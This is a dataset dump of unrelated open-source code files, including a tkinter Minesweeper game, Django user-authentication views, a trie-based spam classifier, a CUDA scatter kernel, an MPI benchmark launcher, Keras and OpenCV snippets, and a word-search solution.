+{"seq_id":"499114418","text":"import random\nimport tkinter as tk\n\nclass MinesweeperTile(object):\n    def __init__(self, has_bomb = False, marked = False):\n        self.clicked = False\n        self.has_bomb = has_bomb\n        self.marked = marked\n\n    def __str__(self):\n        if self.has_bomb:\n            return \"X\"\n        return \"O\"\n\n    def __repr__(self):\n        return self.__str__()\n\n\nclass MinesweeperGame(object):\n    def __init__(self, x, y, percent_full):\n        num_mines = x * y * percent_full / 100.0\n        self.board = []\n        for i in range(x):\n            
self.board.append([])\n for j in range(y):\n self.board[i].append(MinesweeperTile())\n\n i = 0\n while i < num_mines:\n x_mine = random.randint(0,x-1)\n y_mine = random.randint(0,y-1)\n if self.board[x_mine][y_mine].has_bomb == False:\n self.board[x_mine][y_mine].has_bomb = True\n i += 1\n\n def get_score(self, x, y):\n if self.board[x][y].has_bomb:\n return -1\n x_min = x - 1 if x > 0 else 0\n y_min = y - 1 if y > 0 else 0\n x_max = x + 1 if x < len(self.board) else len(self.board)\n y_max = y + 1 if y < len(self.board[0]) else len(self.board[0])\n subset = self.board[x_min:x_max+1]\n new_subset = []\n for column in subset:\n new_subset.append(column[y_min:y_max+1])\n subset = []\n for column in new_subset:\n subset += column\n return sum([1 if tile.has_bomb else 0 for tile in subset])\n\n def __repr__(self):\n return self.__str__()\n\n def __str__(self):\n toreturn = \"\"\n for i in range(len(self.board)):\n line = \"\"\n for j in range(len(self.board[0])):\n if self.board[i][j].clicked:\n line += str(self.get_score(i,j)) + \" \"\n elif self.board[i][j].marked:\n line += \"X \"\n else:\n line += \"O \"\n toreturn += line + \"\\n\"\n return toreturn\n\n\nclass MinesweeperGUI(tk.Frame):\n def __init__(self, parent, game):\n tk.Frame.__init__(self, parent) \n self.grid(row=0,column=0)\n self.parent = parent\n self.game = game\n self.initUI()\n \n \n def initUI(self):\n \n self.parent.title(\"Lines\") \n self.btn = [[0 for x in range(len(game.board[0]))] for y in range(len(game.board))] \n\n for x in range(len(game.board)):\n for y in range(len(game.board[0])):\n self.btn[x][y] = tk.Button(self,command= lambda x=x, y=y: self.button_press(x,y))\n self.btn[x][y].bind(\"\", lambda event, arg={\"x\":x, \"y\":y}: self.right_click(event, arg))\n self.btn[x][y].config(height = 1, width = 1)\n self.btn[x][y].grid(column=x, row=y)\n \n self.pack(fill=tk.BOTH, expand=1)\n\n\n def update_button_visibility(self):\n for i in range(len(self.game.board)):\n for j in range(len(self.game.board[0])):\n if self.game.board[i][j].clicked:\n self.btn[i][j].config(text=self.game.get_score(i,j), bg=\"grey\")\n if self.game.board[i][j].marked:\n self.btn[i][j].config(text=\"X\", bg=\"black\")\n\n\n def right_click(self,event,args):\n if self.game.board[args[\"x\"]][args[\"y\"]].marked:\n self.game.board[args[\"x\"]][args[\"y\"]].marked = False\n else:\n self.game.board[args[\"x\"]][args[\"y\"]].marked = True\n self.update_button_visibility()\n\n def button_press(self, x, y):\n if self.game.board[x][y].has_bomb:\n self.btn[x][y].config(bg=\"red\")\n self.parent.title(\"Game Over\")\n else:\n self.expand_click(x,y)\n self.update_button_visibility()\n\n\n def expand_click(self, x, y):\n if self.game.get_score(x, y) == 0 and not self.game.board[x][y].clicked and not self.game.board[x][y].has_bomb:\n self.game.board[x][y].clicked = True\n if x > 0:\n self.expand_click(x-1, y)\n if x < len(self.game.board)-1:\n self.expand_click(x+1, y)\n if y > 0:\n self.expand_click(x, y-1)\n if y < len(self.game.board[0])-1:\n self.expand_click(x, y+1)\n if x > 0 and y > 0:\n self.expand_click(x-1,y-1)\n if x > 0 and y < len(self.game.board[0]) - 1:\n self.expand_click(x-1,y+1)\n if x < len(self.game.board) - 1 and y > 0:\n self.expand_click(x+1, y-1)\n if x < len(self.game.board) - 1 and y < len(self.game.board[0]) - 1:\n self.expand_click(x+1, y+1)\n\n self.game.board[x][y].clicked = True\n \n\n\n\n\n\n\ngame = MinesweeperGame(30,30,10)\n\nroot = tk.Tk()\napp = MinesweeperGUI(root, 
game)\napp.mainloop()","sub_path":"minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"539185055","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom django.contrib import auth\nfrom django.urls import reverse, reverse_lazy\nfrom .forms import ShopUserLoginForm, ShopUserRegisterForm, ShopUserEditForm, ShopUserProfileEditForm\nfrom django.views.generic.edit import UpdateView\nfrom .models import ShopUser\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.db import transaction\nfrom django.contrib.auth.decorators import login_required\n\n\ndef login(request):\n    title = 'login'\n\n    login_form = ShopUserLoginForm(data=request.POST or None)\n    if request.method == 'POST' and login_form.is_valid():\n        username = request.POST['username']\n        password = request.POST['password']\n        next = request.POST.get('next')\n\n        user = auth.authenticate(username=username, password=password)\n        if user and user.is_active:\n            auth.login(request, user)\n            if next:\n                return HttpResponseRedirect(next)\n            else:\n                return HttpResponseRedirect(reverse('main'))\n    next = request.GET.get('next')\n\n    content = {'title': title, 'login_form': login_form, 'next': next}\n    return render(request, 'authapp/login.html', content)\n\n\ndef logout(request):\n    auth.logout(request)\n    return HttpResponseRedirect(reverse('main'))\n\n\ndef register(request):\n    title = 'registration'\n\n    if request.method == 'POST':\n        register_form = ShopUserRegisterForm(data=request.POST, files=request.FILES)\n\n        if register_form.is_valid():\n            user = register_form.save()\n            if send_verify_mail(user):\n                print(\"The user activation message has been sent by email\")\n                return HttpResponseRedirect(reverse('auth:login'))\n                # auth.login(request, user)\n                # return HttpResponseRedirect(reverse('main'))\n            else:\n                print(\"Error sending the message!\")\n                return HttpResponseRedirect(reverse('auth:login'))\n    else:\n        register_form = ShopUserRegisterForm()\n\n    content = {'title': title, 'register_form': register_form}\n\n    return render(request, 'authapp/register.html', content)\n\n\nclass EditView(UpdateView):\n    model = ShopUser\n    template_name = 'authapp/register.html'\n    fields = 'username', 'email', 'avatar'\n    success_url = reverse_lazy('main')\n\n    def get_context_data(self, **kwargs):\n        context = super(EditView, self).get_context_data(**kwargs)\n        context['title'] = 'Profile editing'\n        context['submit_label'] = 'Apply'\n        return context\n\n\n@login_required\n@transaction.atomic\ndef edit(request):\n    title = 'editing'\n\n    if request.method == 'POST':\n        edit_form = ShopUserEditForm(request.POST, request.FILES, instance=request.user)\n        profile_form = ShopUserProfileEditForm(request.POST, instance=request.user.shopuserprofile)\n        if edit_form.is_valid() and profile_form.is_valid():\n            edit_form.save()\n            return HttpResponseRedirect(reverse('auth:edit'))\n    else:\n        edit_form = ShopUserEditForm(instance=request.user)\n        profile_form = ShopUserProfileEditForm(instance=request.user.shopuserprofile)\n\n    content = {'title': title, 'edit_form': edit_form, 'profile_form': profile_form}\n\n    return render(request, 'authapp/edit.html', content)\n\n\n# def send_verify_mail(user):\n#     verify_link = reverse('auth:verify', args=[user.email, user.activation_key])\n#\n#     title = f'Account confirmation for {user.username}'\n#\n#     message = f'To confirm the account {user.username} on the portal {settings.DOMAIN_NAME}, follow the link: \\n{settings.DOMAIN_NAME}{verify_link}'\n#\n#     print(f'from: {settings.EMAIL_HOST_USER}, to: {user.email}')\n#     return send_mail(title, message, settings.EMAIL_HOST_USER, [user.email], fail_silently=False)\n\n\ndef send_verify_mail(user):\n    verify_link = reverse(\n        'auth:verify',\n        args=[user.email, user.activation_key])\n\n    title = 'Account confirmation for {0}'.format(user.username)\n    message = 'To confirm the account {0} \\\n    on the portal {1}, follow the link: \\\n    \\n{2}{3}'.format(user.username, settings.DOMAIN_NAME, settings.DOMAIN_NAME, verify_link)\n\n    print('from: {0}, to: {1}'.format(settings.EMAIL_HOST_USER, user.email))\n    return send_mail(\n        title,\n        message,\n        settings.EMAIL_HOST_USER,\n        [user.email],\n        fail_silently=False,\n    )\n\n\ndef verify(request, email, activation_key):\n    try:\n        user = ShopUser.objects.get(email=email)\n        context = {\"email\": email}\n        if user.activation_key == activation_key and not user.is_activation_key_expired():\n            print(f'user {user} is activated')\n            user.is_active = True\n            user.save()\n            # backend='django.contrib.auth.backends.ModelBackend'\n            auth.login(request, user, backend='django.contrib.auth.backends.ModelBackend')\n\n            return render(request, 'authapp/verification_ok.html', context)\n        else:\n            print(f'error activation user: {user}')\n            return render(request, 'authapp/verification_error.html', context)\n    except Exception as e:\n        print(f'error activation user: {e.args}')\n\n    return HttpResponseRedirect(reverse('main'))\n\n","sub_path":"authapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"123177799","text":"import random\n\nfrom sklearn.model_selection import train_test_split\nfrom utils import plot_confusion_matrix\nfrom trie import Trie\nfrom datasets import load_sms, load_enron\nfrom sklearn.metrics import classification_report, accuracy_score, confusion_matrix, f1_score\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef count_anomalies(trie, string, r):\n    \"\"\"\n    Slides window of size r across string and counts 1\n    for each time the substring (of size r) was not found in the trie\n    :param trie: Trie that represents the set of self strings\n    :param string: The string to be detected by the trie\n    :param r: Window size\n    :return: Amount of times the substring was not found in the trie, i.e. anomalous substring count\n    \"\"\"\n    count = 0\n    for i in range(len(string)-r+1):\n        if not trie.find(string[i:i+r]):\n            count += 1\n    return count\n\n\ndef predict(trie, X_test, r, confidence_threshold=0.5):\n    \"\"\"\n    Takes a self-recognizing trie and a set of strings to classify\n    :param trie: Self-recognizing trie built by build_self_trie()\n    :param X_test: Set of strings to be classified\n    :param r: Substring size\n    :param confidence_threshold: Threshold at which to decide a sample is anomalous/self. 
Skewing this gives more bias\n to either class\n :return: List of hard predictions (0, 1) and actual probabilities per sample from X_test\n \"\"\"\n y_pred = []\n y_probs = []\n\n for string in X_test:\n anomaly_count = count_anomalies(trie, string, r)\n # The probability that the string does not belong to self is the amount of times its substring (of size r)\n # was not detected in the trie that represents self, divided by the total amount of substrings (of size r)\n prob = anomaly_count / (len(string)-r+1) if len(string) > r else 0\n y_probs.append(prob)\n y_pred.append(prob > confidence_threshold)\n\n return [y_pred, y_probs]\n\n\ndef build_self_trie(X, y, r, train_size=0.667, random_state=None):\n \"\"\"\n Splits X and y in train and test sets. Builds a self recognizing repertoire in the form of a trie, containing\n all substrings of size r.\n :param X: All documents\n :param y: All labels\n :param r: Substring size\n :param train_size: Fraction of self-samples that are used to build the self-trie\n :param random_state: Random seed for reproducibility\n :return: self-recognizing trie, test data containing self and non-self, test labels\n \"\"\"\n if random_state is not None:\n random.seed(random_state)\n\n X_train = ''\n X_test = []\n y_test = []\n\n for doc, label in zip(X, y):\n if len(doc) >= r: # Make sure doc contains at least one substring of length r\n doc = doc.strip() # Strip each doc of leading and trailing whitespaces\n if int(label) == 0: # Samples labeled 0/False are considered to be part of the self-space\n if random.random() > train_size: # Only append some self samples to the test set\n X_test.append(doc)\n y_test.append(label)\n else:\n # Gather all train data as one big concatenated string to maintain as much data of the self set\n # as possible. If we were to build a trie of substring size r document by document we risk losing\n # the last few letters of every sample. 
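                    # (Illustration added for clarity: with r = 4, a lone
                    # document 'hello' contributes only 'hell' and 'ello', so
                    # no substring anchored at its last three characters is
                    # ever inserted into the trie.)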
If we concatenate everything first and build the trie\n # from this, we only risk losing the very end of the last sample\n X_train += doc\n else: # Append each non-self sample to the test set\n X_test.append(doc)\n y_test.append(label)\n\n # Build self-trie from chunks of size r\n self_trie = Trie()\n for i in range(len(X_train)-r+1):\n self_trie.insert(X_train[i:i+r])\n\n return [self_trie, X_test, y_test]\n\n\nif __name__ == '__main__':\n \"\"\"\n Example usage of negative selection\n \"\"\"\n # Choose data set below by enabling the lines that load the desired set and desired plot title name\n documents, labels, target_names = load_sms()\n plt_title = 'SMS Spam Collection'\n # documents, labels, target_names = load_enron()\n # plt_title = 'Enron v1'\n # documents, labels, target_names = load_enron(version=6)\n # plt_title = 'Enron v6'\n X_train, X_test, y_train, y_test = train_test_split(documents, labels,\n test_size=0.5, random_state=42, shuffle=True, stratify=labels)\n\n # Plot accuracy for different values of r\n all_r = list(range(2, 15))\n all_acc = []\n all_f1 = []\n all_cnf = []\n for r in all_r:\n data_trie, data_test, label_test = build_self_trie(X_train, y_train, r, train_size=1)\n predicted, _ = predict(data_trie, X_test, r)\n print(classification_report(y_test, predicted, target_names=target_names))\n print('Accuracy: {:.3f}'.format(accuracy_score(y_test, predicted)))\n print('F1: {:.3f}'.format(f1_score(y_test, predicted)))\n print('Confusion matrix:\\n{}'.format(confusion_matrix(y_test, predicted)))\n all_acc.append(accuracy_score(y_test, predicted))\n all_f1.append(f1_score(y_test, predicted))\n all_cnf.append(confusion_matrix(y_test, predicted))\n plt.figure()\n plt.ylabel('Scores')\n plt.xlabel('r')\n plt.title(plt_title)\n plt.plot(all_r, all_acc, label='Accuracy')\n plt.plot(all_r, all_f1, label='F1')\n print('Max acc at r={}, max f1 at r={}'.format(all_r[np.argmax(all_acc)], all_r[np.argmax(all_f1)]))\n plt.legend()\n plt.figure()\n plot_confusion_matrix(all_cnf[all_acc.index(max(all_acc))], classes=target_names, title=plt_title)\n plt.show()\n","sub_path":"negative_selection/negsel.py","file_name":"negsel.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"499454947","text":"import os\r\nimport pandas as pd\r\nimport csv\r\n\r\nfeatures_folder = os.path.join(os.getcwd(),'Results', 'features', 'monthly_features_full2')\r\noutput_folder = os.path.join(os.getcwd(),'Results', 'features')\r\nflag = True\r\nwith open(os.path.join(output_folder, 'filtered_all_features_nonspam.out'), 'w', encoding='latin-1') as g:\r\n c = csv.writer(g)\r\n for subdir, dirs, files in os.walk(features_folder):\r\n for filename in files:\r\n print(filename)\r\n try:\r\n with open(os.path.join(subdir, filename), 'r', encoding='latin-1') as f:\r\n lines = f.readlines()\r\n if flag:\r\n c.writerow(lines[0].strip().split(\",\"))\r\n flag = False\r\n for i in range(1,11):\r\n c.writerow(lines[i].strip().split(\",\"))\r\n except OSError:\r\n pass","sub_path":"generate_top_10_non_spam_features.py","file_name":"generate_top_10_non_spam_features.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"179552096","text":"import torch\n\nfrom ....utils.cuda import (cuda_num_threads, Stream, Dtype, load_kernel,\n kernel_loop, get_blocks)\n\nkernel = kernel_loop + \"\"\"\nextern \"C\"\n__global__ void 
scatter_arg_max(\nconst ${Dtype}* input, const long* cluster, const ${Dtype}* max,\nlong* argmax) {\n\n CUDA_KERNEL_LOOP(idx, ${num_threads}) {\n\n const int n_idx = idx / ${M};\n const int m_idx = idx % ${M};\n\n int c = cluster[n_idx] * ${M} + m_idx;\n\n ${Dtype} f = input[idx];\n ${Dtype} m = max[c];\n\n if (f == m) argmax[c] = n_idx;\n }\n}\n\"\"\"\n\n\ndef scatter_arg_max_gpu(input, cluster, max):\n with torch.cuda.device_of(input):\n K, M = max.size()\n argmax = torch.cuda.LongTensor(K, M)\n num_threads = input.numel()\n f = load_kernel(\n 'scatter_arg_max',\n kernel,\n Dtype=Dtype(input),\n num_threads=num_threads,\n M=M)\n f(args=[\n input.data_ptr(),\n cluster.data_ptr(),\n max.data_ptr(),\n argmax.data_ptr()\n ],\n block=(cuda_num_threads, 1, 1),\n grid=(get_blocks(num_threads), 1, 1),\n stream=Stream(ptr=torch.cuda.current_stream().cuda_stream))\n\n return argmax\n","sub_path":"torch_geometric/nn/functional/max_pool_voxel/scatter_arg_max_gpu.py","file_name":"scatter_arg_max_gpu.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"632978543","text":"# --------------\n# import packages\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport datetime\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Load the dataset\n\ndf = pd.read_csv(path,sep='\\t')\nprint(df.shape)\n# Converting date attribute from string to datetime.date datatype \nprint(df['date'].dtype)\ndf['date'] = df['date'].astype(datetime.date)\n\n# calculate the total length of word\ndf['length'] = df['verified_reviews'].str.len()\n\n\n\n\n# --------------\n# set figure size\n\nplt.figure(figsize=(10,6))\n\n# generate countplot\nsns.countplot(x='rating',hue='feedback',data=df)\n\n# display plot\nplt.show()\n\n## Product rating vs feedback\n\n# set figure size\nplt.figure(figsize=(10,6))\n\n# generate barplot\nsns.barplot(x='rating',hue='feedback',y='variation',data=df)\n\n# display plot\nplt.show()\n\n\n\n# --------------\n# import packages\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\n\n# declare empty list 'corpus'\n\ncorpus=[]\n\n# for loop to fill in corpus\nfor i in range(3150):\n # retain alphabets\n review = re.findall(r'\\w+',df.loc[i,'verified_reviews'])\n # convert to lower case\n review = [txt.lower() for txt in review]\n # tokenize # initialize stemmer object\n ps = PorterStemmer()\n # perform stemming\n stop_words=set(stopwords.words('english'))\n review = [ps.stem(i) for i in review if i not in stop_words]\n # join elements of list\n review = ' '.join(review)\n # add to 'corpus'\n corpus.append(review)\n# display 'corpus'\nprint(corpus)\n\n\n\n# --------------\n# import libraries\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\n\n\n# Instantiate count vectorizer\ncv = CountVectorizer(max_features=1500)\n\n# Independent variable\nX = cv.fit_transform(corpus)\n\n# dependent variable\ny = df.feedback\n\n# Counts\ncount = y.value_counts()\n\n# Split the dataset\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.2,random_state=0)\n\n\n\n# --------------\n# import packages\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, f1_score\n\n# Instantiate calssifier\nrf = RandomForestClassifier(random_state=2)\n\n# fit model on 
training data\nrf.fit(X_train,y_train)\n\n# predict on test data\ny_pred = rf.predict(X_test) \n\n# calculate the accuracy score\nscore = accuracy_score(y_test,y_pred)\n\n# calculate the precision\nprecision = precision_score(y_test,y_pred)\n\n\n# --------------\n# import packages\nfrom imblearn.over_sampling import SMOTE\n\n# Instantiate smote\nsmote = SMOTE(random_state=9)\n\n# fit_sample onm training data\nX_train, y_train = smote.fit_sample(X_train, y_train)\n\n# fit modelk on training data\nrf.fit(X_train, y_train)\n\n# predict on test data\ny_pred = rf.predict(X_test)\n\n# calculate the accuracy score\nscore = accuracy_score(y_test, y_pred)\n\n# calculate the precision\nprecision = precision_score(y_test, y_pred)\n\n# display precision and score\nprint(score, precision)\n\n\n","sub_path":"SENTIMENT-ANALYSIS/Amazon-Alexa-Reviews/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"453106695","text":"import os, sys\n\nsys.path.insert(0,\"/home1/dtw777/public_html\")\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'web.settings'\nos.environ['PYTHON_EGG_CACHE'] = '/home1/dtw777/.python_egg_cache'\n\n#from django.core.wsgi import get_wsgi_application\n#application = get_wsgi_application()\n\ndef application(environ, start_response):\n \"\"\"Simplest possible application object\"\"\"\n output = \"Hello World\"\n status = '200 OK'\n response_headers = [('Content-type', 'text/plain'), ('Content-Length', str(len(output)))]\n start_response(status, response_headers)\n return [output] ","sub_path":"conf/dispatch.wsgi","file_name":"dispatch.wsgi","file_ext":"wsgi","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"51405559","text":"import sys\nimport math\nimport subprocess\nimport os\nimport shutil\n\nDIR_SCRIPT = \"./\"+os.path.dirname(sys.argv[0])\nif (sys.platform == \"win32\"):\n\tFOLDER=\"/Release/\"\n\tMPI=\"mpiexec\"\nelse: \n\tFOLDER=\"\"\n\tMPI=\"$I_MPI_ROOT/intel64/bin/mpiexec\"\n\n\nNAME_PAR_PROGRAM = \"\\\"\"+DIR_SCRIPT+\"/../../../../build/src/examples/running_wave/running_wave_parallel/\"+FOLDER+\"/running_wave_parallel\"+\"\\\"\"\n\n#HOSTS=[\"node10\",\"node13\",\"node14\",\"node15\",\"node18\",\"node101\",\"node21\",\"node22\",\"node23\",\"node26\",\"node27\",\"node28\",\"node29\",\"node30\",\"node32\",\"node34\"]\nHOSTS=[\"node104\",\"node105\",\"node106\",\"node107\"]\n\nLIGHT_SPEED = 29979245800\n\nNX = 2048\nNY = 1\nNZ = 2048\n\nD = 1\n\nDT = D/LIGHT_SPEED\n\nSOLVER = \"PSATD\"\n\nLAMBD = 64 * D\nANGLE = 0\n\n#NUM_NODES=[2, 4, 8, 16]\nNUM_NODES=[2, 4]\n\nNUM_ITER=1024\nNUM_ITER_IN_DOMAIN = 12 # k in article\n\nN_THREADS = 16\n\nGUARD = 32\n\nREPEAT = 3\n\nprint(\"MPI_VERSION_STRONG_SCALABILITY\")\n\nfor N_NODES in NUM_NODES:\n\t\n\tdeg_num_nodes = int(math.log(N_NODES)/math.log(2))\n\tnpx=2**int(deg_num_nodes/2)\n\tnpz=int(N_NODES/npx)\n\tprint(str(npx)+\"x\"+str(npz))\n\t\n\thosts=HOSTS[0]\n\tfor i in range(1,N_NODES):\n\t\thosts+=\",\"+HOSTS[i]\n\t\n\tcommand_args_par = \"-ax \"+str(0)+\" \"+\\\n\t\t\t\t\t\t\"-ay \"+str(0)+\" \"+\\\n\t\t\t\t\t\t\"-az \"+str(0)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-dx \"+str(D)+\" \"+\\\n\t\t\t\t\t\t\"-dy \"+str(D)+\" \"+\\\n\t\t\t\t\t\t\"-dz \"+str(D)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-nx \"+str(NX)+\" \"+\\\n\t\t\t\t\t\t\"-ny \"+str(NY)+\" \"+\\\n\t\t\t\t\t\t\"-nz \"+str(NZ)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-dt \"+str(DT)+\" 
\"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-solver \"+str(SOLVER)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-npx \"+str(npx)+\" \"+\\\n\t\t\t\t\t\t\"-npy \"+str(1)+\" \"+\\\n\t\t\t\t\t\t\"-npz \"+str(npz)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-gx \"+str(GUARD)+\" \"+\\\n\t\t\t\t\t\t\"-gy \"+str(0)+\" \"+\\\n\t\t\t\t\t\t\"-gz \"+str(GUARD)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-nseqi \"+str(0)+\" \"+\\\n\t\t\t\t\t\t\"-npari \"+str(NUM_ITER)+\" \"+\\\n\t\t\t\t\t\t\"-ndomi \"+str(NUM_ITER_IN_DOMAIN)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-mask simple \"+\\\n\t\t\t\t\t\t\"-filter off \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-dim \"+str(1)+\" \"\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-dump off \"\\\n\t\t\t\t\t\t\"-dir \"+str(DIR_SCRIPT)+\" \"\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-nthreads \"+str(N_THREADS)+\" \"\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-lambda \"+str(LAMBD)+\" \"+\\\n\t\t\t\t\t\t\"-angle \"+str(ANGLE)+\" \";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\n\tfor rep in range(REPEAT):\n\t\tprocess_seq = subprocess.Popen(MPI+\" -np \"+str(N_NODES)+\" -ppn 1 -hosts \"+hosts+\" \"+NAME_PAR_PROGRAM+\" \"+command_args_par, shell=True)\n\t\tprocess_seq.wait()\n\t\t","sub_path":"scripts/running_wave/run/time_test/test_MPI_strong_scalability.py","file_name":"test_MPI_strong_scalability.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"292979388","text":"import keras\nimport keras.backend as K\n\nfrom keras.layers import Layer\nfrom keras import initializers\n\n\nclass PositionEmbedding(Layer):\n def __init__(\n self,\n input_dim,\n output_dim,\n embeddings_initializer=keras.initializers.Zeros(),\n **kwargs\n ):\n super(PositionEmbedding, self).__init__(**kwargs)\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.embeddings_initializer = embeddings_initializer\n\n def build(self, input_shape):\n super(PositionEmbedding, self).build(input_shape)\n self.embeddings = self.add_weight(\n name='position_embeddings',\n shape=(self.input_dim, self.output_dim),\n initializer=self.embeddings_initializer)\n\n def call(self, inputs, **kwargs):\n input_shape = K.shape(inputs)\n batch_size, seq_len = input_shape[0], input_shape[1]\n pos_embeddings = self.embeddings[:seq_len]\n pos_embeddings = K.expand_dims(pos_embeddings, 0)\n return inputs + pos_embeddings\n\n def compute_mask(self, inputs, mask=None):\n return mask\n\n def get_config(self):\n config = {\n 'input_dim': self.input_dim,\n 'output_dim': self.output_dim,\n 'embeddings_initializer': initializers.serialize(self.embeddings_initializer)\n }\n base_config = super(PositionEmbedding, self).get_config()\n return dict(list(config.items()) + list(base_config.items()))\n","sub_path":"layers/PositionEmbedding.py","file_name":"PositionEmbedding.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"318460976","text":"\"\"\"\nCollection of Numpy random functions, wrapped to fit Ivy syntax and signature.\n\"\"\"\n\n# global\nimport numpy as _np\n\nrandom_uniform = lambda low, high, size, _=None: _np.random.uniform(low, high, size)\nrandint = lambda low, high, size, _=None: _np.random.randint(low, high, size)\nseed = lambda seed_value: _np.random.seed(seed_value)\n\n\ndef shuffle(x):\n _np.random.shuffle(x)\n return 
x\n","sub_path":"ivy/numpy/core/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"183461866","text":"import numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nimg = cv.imread('box.png', cv.IMREAD_GRAYSCALE)\nassert img is not None, \"file could not be read, check with os.path.exists()\"\n# Output dtype = cv.CV_8U\nsobelx8u = cv.Sobel(img,cv.CV_8U,1,0,ksize=5)\n# Output dtype = cv.CV_64F. Then take its absolute and convert to cv.CV_8U\nsobelx64f = cv.Sobel(img,cv.CV_64F,1,0,ksize=5)\nabs_sobel64f = np.absolute(sobelx64f)\nsobel_8u = np.uint8(abs_sobel64f)\nplt.subplot(1,3,1),plt.imshow(img,cmap = 'gray')\nplt.title('Original'), plt.xticks([]), plt.yticks([])\nplt.subplot(1,3,2),plt.imshow(sobelx8u,cmap = 'gray')\nplt.title('Sobel CV_8U'), plt.xticks([]), plt.yticks([])\nplt.subplot(1,3,3),plt.imshow(sobel_8u,cmap = 'gray')\nplt.title('Sobel abs(CV_64F)'), plt.xticks([]), plt.yticks([])\nplt.show()\n","sub_path":"openCV/openCV.py/image_processing/13.image_gradients_02.py","file_name":"13.image_gradients_02.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"282930458","text":"class Solution:\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n\n def helper(board, i, j, word):\n if len(word) == 0:\n return True\n\n if (len(board) == 0 or\n i < 0 or i >= len(board) or\n j < 0 or j >= len(board[0]) or\n board[i][j] != word[0]):\n return False\n\n board[i][j] = '#' # prevent backtrack\n if (helper(board, i+1, j, word[1:])\n or helper(board, i, j + 1, word[1:])\n or helper(board, i-1, j, word[1:])\n or helper(board, i, j-1, word[1:])\n ):\n return True\n board[i][j] = word[0]\n return False\n\n m = len(board)\n if m == 0:\n return False\n n = len(board[0])\n\n for i in range(m):\n for j in range(n):\n if helper(board, i, j, word):\n return True\n return False\n","sub_path":"79.word-search.python3.py","file_name":"79.word-search.python3.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"210142002","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2012 IBM\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
